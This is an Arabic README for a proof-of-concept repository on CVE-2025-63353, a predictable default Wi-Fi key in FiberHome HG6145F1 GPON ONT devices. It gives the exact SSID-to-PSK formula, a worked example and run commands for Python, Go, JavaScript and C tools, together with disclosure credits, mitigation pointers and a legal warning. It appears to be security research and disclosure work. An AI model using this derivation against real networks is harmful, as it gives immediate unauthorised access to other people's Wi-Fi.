
إثبات المفهوم متعدد اللغات (Python · Go · JS · C) ووثائق تقنية لـ CVE-2025-63353، ثغرة خطيرة مرتبطة بمفتاح PSK افتراضي يمكن التنبؤ به في أجهزة FiberHome HG6145F1 GPON ONT.
مجموعة أدوات بحث تعليمية وإثبات المفهوم بلغات متعددة لـ CVE-2025-63353، وهي ثغرة حرجة تتعلق بمفتاح Wi-Fi الافتراضي القابل للتوقع تؤثر على أجهزة FiberHome HG6145F1 RP4423 GPON ONT.
مفتاح Wi-Fi المشترك مسبقًا الافتراضي في المصنع على أجهزة FiberHome HG6145F1 المتأثرة هو دالة حتمية لمعرف SSID المبثوث. يمكن للمهاجم الذي يرصد إطارًا إرشاديًا من جهاز ضعيف استخلاص مفتاح WPA2 PSK في وقت ثابت دون الحاجة إلى مصافحة مسجلة أو قائمة كلمات أو GPU أو تفاعل عميل.
بالنسبة لجهاز يبث SSID fh_<hex_a>، فإن مفتاح PSK الافتراضي هو:
PSK = "wlan" + hex(0xFFFFFF XOR hex_a)
مثال: fh_a1f9d1 → wlan5e062e
مساحة المفاتيح الفعالة لكل جهاز هي 1. مساحة المفاتيح على مستوى جميع عمليات نشر HG6145F1 هي على الأكثر 2²⁴ ≈ 16.7 مليون زوج (SSID, PSK)، وبما أن SSID يُبث، فإن التعيين من SSID إلى PSK هو واحد لواحد.
هذا العمل مبني بالكامل على البحث والكشف الأصلي عن الثغرة من قبل هاني أنيس بوزيد:
جميع الفضل في اكتشاف الثغرة والإفصاح العام الأولي يعود إلى هاني أنيس بوزيد. هذا المستودع يوسع الإفصاح الأصلي بتطبيقات إثبات المفهوم بلغات متعددة ومجموعة وثائق فنية منسقة.
.
├── README.md
├── LICENSE
├── docs/
│ ├── vulnerability.md Technical analysis of the algorithm
│ ├── timeline.md Disclosure chronology and vendor response
│ ├── affected-deployments.md Device specifications and known deployments
│ ├── related-research.md Lineage of predictable-PSK vulnerabilities
│ ├── references.md Curated bibliography
│ └── mitigation.md Guidance for users, ISPs, and vendors
└── poc/
├── python/ pure-Python implementation, no dependencies
├── go/ standalone Go binary
├── javascript/ browser-friendly JS / Node.js
└── c/ portable single-file ANSI C (compiles anywhere)
# Python
python3 poc/python/fh-poc.py fh_a1f9d1
# wlan5e062e
# Go
cd poc/go && go run fh-poc.go fh_a1f9d1
# wlan5e062e
# JavaScript (Node)
node poc/javascript/fh-poc.js fh_a1f9d1
# wlan5e062e
# C
cc poc/c/fh-poc.c -o fh-poc && ./fh-poc fh_a1f9d1
# wlan5e062e
جميع التطبيقات الأربعة مكتوبة بشكل مستقل، خالية من التبعيات، وتنتج مخرجات متطابقة. استخدم ما يناسب بيئتك.
| الحقل | القيمة |
|---|---|
| Vendor | FiberHome (Wuhan FiberHome International Technologies) |
| Model | HG6145F1 |
يتم الإفصاح حاليًا عن الثغرة لإصدار البرامج الثابتة RP4423 من HG6145F1 فقط. التحقق عبر عائلة الطرازات الأوسع HG6145 / HG6243 / HG6821 هو سؤال بحث مفتوح. انظر docs/affected-deployments.md.
للمستخدمين النهائيين لجهاز HG6145F1:
انظر docs/mitigation.md للحصول على إرشادات خاصة بمقدمي خدمات الإنترنت والموردين.
يتم نشر هذا المستودع لأغراض البحث الأمني التعليمي والدفاعي فقط. الثغرة الموثقة هنا تم الإفصاح عنها علنًا تحت CVE-2025-63353 وتم تصنيفها بخطورة حرجة من قبل CISA-ADP.
استخدام الكود في هذا المستودع ضد شبكات لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها هو غير قانوني في معظم الولايات القضائية، بما في ذلك بموجب القانون المغربي 07-03 المتعلق بالجرائم الإلكترونية، وأطر إساءة استخدام الحاسوب في الاتحاد الأوروبي، وقانون الاحتيال وإساءة استخدام الحاسوب الأمريكي، والتشريعات المماثلة في أماكن أخرى. لا يتحمل المؤلفون أي مسؤولية عن الاستخدام غير المصرح به لهذه المواد.
قائمة مراجع كاملة للمصادر الأولية والثغرات ذات الصلة والأدبيات الأكاديمية محفوظة في docs/references.md.
نتائج الاختبارات الموثقة ضد نماذج إضافية من FiberHome أو إصدارات برامج ثابتة أو متغيرات مخصصة لمزودي الخدمة مرحب بها عبر طلب سحب إلى docs/affected-deployments.md. يرجى تضمين إصدار البرنامج الثابت وبادئة SSID على ملصق الجهاز وطريقة التحقق.
أيمن وادي — مهندس أمن
| Firmware |
| RP4423 |
| Device type | GPON ONT، Wi-Fi 6 (802.11ax)، ثنائي النطاق 2.4/5 جيجاهرتز |
| Standards | ITU-T G.984 Class B+, IEEE 802.11 a/b/g/n/ac/ax |